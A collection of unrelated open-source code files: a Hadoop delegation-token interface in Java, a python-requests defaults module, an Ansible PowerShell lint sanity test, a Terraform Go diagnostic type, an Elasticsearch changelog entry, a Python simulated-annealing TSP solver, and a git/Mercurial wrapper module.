* limitations under the License.
*/
package org.apache.hadoop.security.token;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.classification.InterfaceStability;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.security.Credentials;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
/**
* Class for issuing delegation tokens.
*/
@InterfaceAudience.LimitedPrivate({"HDFS", "MapReduce", "Yarn"})
@InterfaceStability.Unstable
public interface DelegationTokenIssuer {
Logger TOKEN_LOG = LoggerFactory.getLogger(DelegationTokenIssuer.class);
/**
* The service name used as the alias for the token in the credential
* token map. addDelegationTokens will use this to determine if
* a token exists, and if not, add a new token with this alias.
* @return the token.
*/
String getCanonicalServiceName();
/**
* Unconditionally get a new token with the optional renewer. Returning
* null indicates the service does not issue tokens.
* @param renewer renewer.
* @return the token.
* @throws IOException raised on errors performing I/O.
*/
Token<?> getDelegationToken(String renewer) throws IOException;
/**
* Issuers may need tokens from additional services.
*
* @return delegation token issuer.
* @throws IOException raised on errors performing I/O.
*/
default DelegationTokenIssuer[] getAdditionalTokenIssuers()
throws IOException {
return null;
}
/**
* Given a renewer, add delegation tokens for issuer and it's child issuers
* to the <code>Credentials</code> object if it is not already present.
*<p>
* Note: This method is not intended to be overridden. Issuers should
* implement getCanonicalService and getDelegationToken to ensure
* consistent token acquisition behavior.
*
* @param renewer the user allowed to renew the delegation tokens
* @param credentials cache in which to add new delegation tokens
* @return list of new delegation tokens
* @throws IOException thrown if IOException if an IO error occurs.
*/
default Token<?>[] addDelegationTokens(
final String renewer, Credentials credentials) throws IOException {
if (credentials == null) {
credentials = new Credentials();
}
final List<Token<?>> tokens = new ArrayList<>();
collectDelegationTokens(this, renewer, credentials, tokens);
return tokens.toArray(new Token<?>[tokens.size()]);
}
/**
* NEVER call this method directly.
*
* @param issuer issuer.
* @param renewer renewer.
* @param credentials cache in which to add new delegation tokens.
* @param tokens list of new delegation tokens.
* @throws IOException raised on errors performing I/O.
*/
@InterfaceAudience.Private
static void collectDelegationTokens(
final DelegationTokenIssuer issuer,
final String renewer,
final Credentials credentials,
final List<Token<?>> tokens) throws IOException {
final String serviceName = issuer.getCanonicalServiceName();
// Collect token of the this issuer and then of its embedded children
if (TOKEN_LOG.isDebugEnabled()) {
TOKEN_LOG.debug("Search token for service {} in credentials",
serviceName);
}
if (serviceName != null) {
final Text service = new Text(serviceName);
Token<?> token = credentials.getToken(service);
if (token == null) {
if (TOKEN_LOG.isDebugEnabled()) {
TOKEN_LOG.debug("Token for service {} not found in credentials," +
" try getDelegationToken.", serviceName);
}
token = issuer.getDelegationToken(renewer);
if (token != null) {
tokens.add(token);
credentials.addToken(service, token);
}
} else {
if (TOKEN_LOG.isDebugEnabled()) {
TOKEN_LOG.debug("Token for service {} found in credentials," +
"skip getDelegationToken.", serviceName);
}
}
}
// Now collect the tokens from the children.
final DelegationTokenIssuer[] ancillary =
issuer.getAdditionalTokenIssuers();
if (ancillary != null) {
for (DelegationTokenIssuer subIssuer : ancillary) {
collectDelegationTokens(subIssuer, renewer, credentials, tokens);
}
}
}
} | java | github | https://github.com/apache/hadoop | hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/security/token/DelegationTokenIssuer.java |
# -*- coding: utf-8 -*-
"""
requests.defaults
~~~~~~~~~~~~~~~~~
This module provides the Requests configuration defaults.
Configurations:
:base_headers: Default HTTP headers.
:verbose: Stream to write request logging to.
:max_redirects: Maximum number of redirects allowed within a request.s
:keep_alive: Reuse HTTP Connections?
:max_retries: The number of times a request should be retried in the event of a connection failure.
:danger_mode: If true, Requests will raise errors immediately.
:safe_mode: If true, Requests will catch all errors.
:strict_mode: If true, Requests will do its best to follow RFCs (e.g. POST redirects).
:pool_maxsize: The maximium size of an HTTP connection pool.
:pool_connections: The number of active HTTP connection pools to use.
:encode_uri: If true, URIs will automatically be percent-encoded.
:trust_env: If true, the surrouding environment will be trusted (environ, netrc).
"""
SCHEMAS = ['http', 'https']
from . import __version__
defaults = dict()
defaults['base_headers'] = {
'User-Agent': 'python-requests/%s' % __version__,
'Accept-Encoding': ', '.join(('identity', 'deflate', 'compress', 'gzip')),
'Accept': '*/*'
}
defaults['verbose'] = None
defaults['max_redirects'] = 30
defaults['pool_connections'] = 10
defaults['pool_maxsize'] = 10
defaults['max_retries'] = 0
defaults['danger_mode'] = False
defaults['safe_mode'] = False
defaults['strict_mode'] = False
defaults['keep_alive'] = True
defaults['encode_uri'] = True
defaults['trust_env'] = True | unknown | codeparrot/codeparrot-clean | ||
"""Sanity test using PSScriptAnalyzer."""
from __future__ import absolute_import, print_function
import collections
import json
import os
import re
from lib.sanity import (
SanitySingleVersion,
SanityMessage,
SanityFailure,
SanitySuccess,
SanitySkipped,
)
from lib.util import (
SubprocessError,
run_command,
find_executable,
)
from lib.config import (
SanityConfig,
)
from lib.test import (
calculate_confidence,
calculate_best_confidence,
)
PSLINT_SKIP_PATH = 'test/sanity/pslint/skip.txt'
PSLINT_IGNORE_PATH = 'test/sanity/pslint/ignore.txt'
class PslintTest(SanitySingleVersion):
"""Sanity test using PSScriptAnalyzer."""
def test(self, args, targets):
"""
:type args: SanityConfig
:type targets: SanityTargets
:rtype: TestResult
"""
with open(PSLINT_SKIP_PATH, 'r') as skip_fd:
skip_paths = skip_fd.read().splitlines()
invalid_ignores = []
with open(PSLINT_IGNORE_PATH, 'r') as ignore_fd:
ignore_entries = ignore_fd.read().splitlines()
ignore = collections.defaultdict(dict)
line = 0
for ignore_entry in ignore_entries:
line += 1
if ' ' not in ignore_entry:
invalid_ignores.append((line, 'Invalid syntax'))
continue
path, code = ignore_entry.split(' ', 1)
if not os.path.exists(path):
invalid_ignores.append((line, 'Remove "%s" since it does not exist' % path))
continue
ignore[path][code] = line
paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] in ('.ps1', '.psm1', '.psd1') and i.path not in skip_paths)
if not paths:
return SanitySkipped(self.name)
if not find_executable('pwsh', required='warning'):
return SanitySkipped(self.name)
cmd = ['test/sanity/pslint/pslint.ps1'] + paths
try:
stdout, stderr = run_command(args, cmd, capture=True)
status = 0
except SubprocessError as ex:
stdout = ex.stdout
stderr = ex.stderr
status = ex.status
if stderr:
raise SubprocessError(cmd=cmd, status=status, stderr=stderr, stdout=stdout)
if args.explain:
return SanitySuccess(self.name)
severity = [
'Information',
'Warning',
'Error',
]
cwd = os.getcwd() + '/'
# replace unicode smart quotes with ascii versions
stdout = re.sub(u'[\u2018\u2019]', "'", stdout)
stdout = re.sub(u'[\u201c\u201d]', '"', stdout)
messages = json.loads(stdout)
errors = [SanityMessage(
code=m['RuleName'],
message=m['Message'],
path=m['ScriptPath'].replace(cwd, ''),
line=m['Line'] or 0,
column=m['Column'] or 0,
level=severity[m['Severity']],
) for m in messages]
line = 0
filtered = []
for error in errors:
if error.code in ignore[error.path]:
ignore[error.path][error.code] = None # error ignored, clear line number of ignore entry to track usage
else:
filtered.append(error) # error not ignored
errors = filtered
for invalid_ignore in invalid_ignores:
errors.append(SanityMessage(
code='A201',
message=invalid_ignore[1],
path=PSLINT_IGNORE_PATH,
line=invalid_ignore[0],
column=1,
confidence=calculate_confidence(PSLINT_IGNORE_PATH, line, args.metadata) if args.metadata.changes else None,
))
for path in skip_paths:
line += 1
if not os.path.exists(path):
# Keep files out of the list which no longer exist in the repo.
errors.append(SanityMessage(
code='A101',
message='Remove "%s" since it does not exist' % path,
path=PSLINT_SKIP_PATH,
line=line,
column=1,
confidence=calculate_best_confidence(((PSLINT_SKIP_PATH, line), (path, 0)), args.metadata) if args.metadata.changes else None,
))
for path in paths:
if path not in ignore:
continue
for code in ignore[path]:
line = ignore[path][code]
if not line:
continue
errors.append(SanityMessage(
code='A102',
message='Remove since "%s" passes "%s" test' % (path, code),
path=PSLINT_IGNORE_PATH,
line=line,
column=1,
confidence=calculate_best_confidence(((PSLINT_IGNORE_PATH, line), (path, 0)), args.metadata) if args.metadata.changes else None,
))
if errors:
return SanityFailure(self.name, messages=errors)
return SanitySuccess(self.name) | unknown | codeparrot/codeparrot-clean | ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package graph
import "github.com/hashicorp/terraform/internal/tfdiags"
// DiagnosticCausedByTestFailure implements multiple interfaces that enables it to
// be used in the "Extra" field of a diagnostic. This type should only be used as
// the Extra for diagnostics reporting assertions that fail in a run block during
// `terraform test`.
//
// DiagnosticCausedByTestFailure implements the [DiagnosticExtraCausedByTestFailure]
// interface. This allows downstream logic to identify diagnostics that are specifically
// due to assertion failures.
//
// DiagnosticCausedByTestFailure also implements the [DiagnosticExtraBecauseEphemeral],
// [DiagnosticExtraBecauseSensitive], and [DiagnosticExtraBecauseUnknown] interfaces.
// These interfaces allow the diagnostic renderer to include ephemeral, sensitive or
// unknown data if it's present. This is enabled because if a test fails then the user
// will want to know what values contributed to the failing assertion.
//
// When using this, set the Extra to DiagnosticCausedByTestFailure(true) and also
// populate the EvalContext and Expression fields of the diagnostic.
type DiagnosticCausedByTestFailure struct {
Verbose bool
}
var _ tfdiags.DiagnosticExtraCausedByTestFailure = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseEphemeral = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseSensitive = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseUnknown = DiagnosticCausedByTestFailure{false}
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByTestFailure() bool {
return true
}
func (e DiagnosticCausedByTestFailure) IsTestVerboseMode() bool {
return e.Verbose
}
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByEphemeral() bool {
return true
}
func (e DiagnosticCausedByTestFailure) DiagnosticCausedBySensitive() bool {
return true
}
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByUnknown() bool {
return true
} | go | github | https://github.com/hashicorp/terraform | internal/moduletest/graph/diagnostics.go |
area: ES|QL
issues: []
pr: 142160
summary: Add `appliesTo` to the TRange and TBucket functions
type: enhancement | unknown | github | https://github.com/elastic/elasticsearch | docs/changelog/142160.yaml |
"""
Implementacion del algoritmo de recocido simulado
para la materia electiva Computacion Emergente
@author Yohan Graterol <yograterol@fedoraproject.org> 2013
"""
from collections import deque
from math import exp
try:
from numpy.random import (permutation, random_sample)
from numpy import (log, matrix, array, add)
except ImportError:
from numpypy.random import (permutation, random_sample)
from numpypy import (log, matrix, array, add)
from copy import deepcopy
from random import randint
from time import time
class LoadData(object):
__slots__ = ['data', 'matrix']
file_name = 'tsp29.txt'
def __init__(self, file_name=None):
if file_name:
self.file_name = file_name
self.load_data()
def load_data(self):
tmp_file = open(self.file_name)
self.data = tmp_file.readlines()
self.data.append('0 0')
tmp_file.close()
def create_matrix(self):
self.matrix = list()
total_line = len(self.data)
for line in self.data:
line = deque(map(lambda x: int(x), line.split()))
for i in range(total_line - len(line)):
line.appendleft(0)
self.matrix.append(list(line))
self.matrix = array(self.matrix)
self.matrix = add(self.matrix, self.matrix.transpose())
class SimulatedAnnealing(object):
__slots__ = ['matrix', 'T', 't', 't_final', 'step', 'cities', 'firts_vc',
'Vc', 'Vn', 'Vc_eval', 'Vn_eval', 'alpha']
def __init__(self, T=1000, alpha=0.9899, t_final=0.001, t=1, cities=29, step=200):
data = LoadData()
data.create_matrix()
self.matrix = data.matrix
self.T = T
#self.t = t
self.t_final = t_final
self.alpha = alpha
self.cities = cities
self.Vc = None
self.firts_vc = range(self.cities)
self.step = step
#import pandas
#print pandas.DataFrame(self.matrix, range(self.cities), range(self.cities))
def tsp(self):
self.Vc = self.generate_solution()
self.Vc_eval = self.eval_solution(self.Vc)
while(self.T > self.t_final):
for i in range(self.step):
self.Vn = self.generate_solution(self.Vc)
self.Vn_eval = self.eval_solution(self.Vn)
delta = self.Vn_eval - self.Vc_eval
if delta < 0:
self.Vc = self.Vn
self.Vc_eval = self.Vn_eval
elif random_sample() < exp(-delta/self.T):
self.Vc = self.Vn
self.Vc_eval = self.Vn_eval
self.T *= self.alpha
#self.T *= self.reduce_temp(self.t)
#self.t += 1
def reduce_temp(self, t):
return self.alpha / log(1 + t)
def generate_solution(self, Vc=None):
if Vc is None:
Vn = list(permutation(self.firts_vc))
return Vn
Vn = deepcopy(Vc)
i1 = randint(0, self.cities - 1)
i2 = randint(0, self.cities - 1)
while(i1 == i2):
i2 = randint(0, self.cities - 1)
Vn[i1], Vn[i2] = Vn[i2], Vn[i1]
return Vn
def eval_solution(self, Vn):
km = 0
for c in range(len(Vn) - 1):
i = Vn[c]
j = Vn[c + 1]
km += self.matrix[i][j]
km += self.matrix[Vn[0]][Vn[self.cities - 1]]
return km
def print_result(self):
print self.Vc
print self.eval_solution(self.Vc)
if __name__ == '__main__':
start = time()
tsp = SimulatedAnnealing()
tsp.tsp()
print "Resultado optimo"
tsp.print_result()
print "Tiempo: ", time() - start | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2014 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import os
import subprocess
import tempfile
import logging
import hgapi
import errno
# fsutils, , misc filesystem utils, internal
import fsutils
git_logger = logging.getLogger('git')
hg_logger = logging.getLogger('hg')
class VCSError(Exception):
def __init__(self, message, returncode=None):
super(VCSError, self).__init__(message)
self.returncode = returncode
class VCS(object):
@classmethod
def cloneToTemporaryDir(cls, remote):
raise NotImplementedError()
@classmethod
def cloneToDirectory(cls, remote, directory, tag=None):
raise NotImplementedError()
def isClean(self):
raise NotImplementedError()
def commit(self, message, tag=None):
raise NotImplementedError()
def isClean(self):
raise NotImplementedError()
def tags(self):
raise NotImplementedError()
def markForCommit(self, path):
pass
def remove(self):
raise NotImplementedError()
def __nonzero__(self):
raise NotImplementedError()
# python 3 truthiness
def __bool__(self):
return self.__nonzero__()
class Git(VCS):
def __init__(self, path):
self.worktree = path
self.gitdir = os.path.join(path, '.git')
@classmethod
def cloneToTemporaryDir(cls, remote):
return cls.cloneToDirectory(remote, tempfile.mkdtemp())
@classmethod
def cloneToDirectory(cls, remote, directory, tag=None):
commands = [
['git', 'clone', remote, directory]
]
cls._execCommands(commands)
r = Git(directory)
if tag is not None:
r.updateToTag(tag)
return r
def fetchAllBranches(self):
remote_branches = []
local_branches = []
# list remote branches
out, err = self._execCommands([self._gitCmd('branch', '-r')])
for line in out.split(b'\n'):
branch_info = line.split(b' -> ')
# skip HEAD:
if len(branch_info) > 1:
continue
remote_branch = branch_info[0].strip()
branch = b'/'.join(remote_branch.split(b'/')[1:])
remote_branches.append((remote_branch, branch))
# list already-existing local branches
out, err = self._execCommands([self._gitCmd('branch')])
for line in out.split(b'\n'):
local_branches.append(line.strip(b' *'))
for remote, branchname in remote_branches:
# don't try to replace existing local branches
if branchname in local_branches:
continue
try:
out, err = self._execCommands([
self._gitCmd('checkout', '-b', branchname, remote)
])
except VCSError as e:
git_logger.error('failed to fetch remote branch %s %s' % (remote, branchname))
raise
def remove(self):
fsutils.rmRf(self.worktree)
def workingDirectory(self):
return self.worktree
def _gitCmd(self, *args):
return ['git','--work-tree=%s' % self.worktree,'--git-dir=%s'%self.gitdir.replace('\\', '/')] + list(args);
@classmethod
def _execCommands(cls, commands):
out, err = None, None
for cmd in commands:
try:
child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError as e:
if e.errno == errno.ENOENT:
if cmd[0] == 'git':
raise VCSError(
'git is not installed, or not in your path. Please follow the installation instructions at http://docs.yottabuild.org/#installing'
)
else:
raise VCSError('%s is not installed' % (cmd[0]))
else:
raise VCSError('command %s failed' % (cmd))
out, err = child.communicate()
returncode = child.returncode
if returncode:
raise VCSError("command failed: %s:%s" % (cmd, err or out), returncode=returncode)
return out, err
def isClean(self):
commands = [
self._gitCmd('diff', '--quiet', '--exit-code'),
self._gitCmd('diff', '--cached', '--quiet', '--exit-code'),
]
try:
out, err = self._execCommands(commands)
except VCSError as e:
if e.returncode:
return False
else:
raise
return True
def markForCommit(self, relative_path):
commands = [
self._gitCmd('add', os.path.join(self.worktree, relative_path)),
]
self._execCommands(commands)
def updateToTag(self, tag):
commands = [
self._gitCmd('checkout', tag),
]
self._execCommands(commands)
def tags(self):
commands = [
self._gitCmd('tag', '-l')
]
out, err = self._execCommands(commands)
# I think utf-8 is the right encoding? commit messages are utf-8
# encoded, couldn't find any documentation on tag names.
return out.decode('utf-8').split(u'\n')
def branches(self):
commands = [
self._gitCmd('branch', '--list')
]
out, err = self._execCommands(commands)
return [x.lstrip(' *') for x in out.decode('utf-8').split('\n')]
def commit(self, message, tag=None):
commands = [
self._gitCmd('commit', '-m', message),
]
if tag:
commands.append(
self._gitCmd('tag', tag, '-a', '-m', tag),
)
self._execCommands(commands)
def __nonzero__(self):
return True
# FIXME: hgapi will throw HgException when something goes wrong, it may be worth trying
# to catch that in some methods
class HG(VCS):
def __init__(self, path):
self.worktree = path
self.repo = hgapi.Repo(path)
@classmethod
def cloneToTemporaryDir(cls, remote):
return cls.cloneToDirectory(remote, tempfile.mkdtemp())
@classmethod
def cloneToDirectory(cls, remote, directory, tag=None):
# hg doesn't automatically create the directories needed by destination
try:
os.makedirs(directory)
except:
pass
hg_logger.debug('will clone %s into %s', remote, directory)
hgapi.Repo.hg_clone(remote, directory)
r = HG(directory)
if tag is not None:
r.updateToTag(tag)
return r
def remove(self):
fsutils.rmRf(self.worktree)
def workingDirectory(self):
return self.worktree
def isClean(self):
return not bool(self.repo.hg_status(empty=True))
def markForCommit(self, relative_path):
self.repo.hg_add(os.path.join(self.worktree, relative_path))
def updateToTag(self, tag):
self.repo.hg_update(tag)
def tags(self):
l = list(self.repo.hg_tags().keys())
l.remove('tip')
return l
def commit(self, message, tag=None):
self.repo.hg_commit(message)
if tag:
self.repo.hg_tag(tag)
def __nonzero__(self):
return True
def getVCS(path):
# crude heuristic, does the job...
if os.path.exists(os.path.join(path, '.git')):
return Git(path)
if os.path.isdir(os.path.join(path, '.hg')):
return HG(path)
return None | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.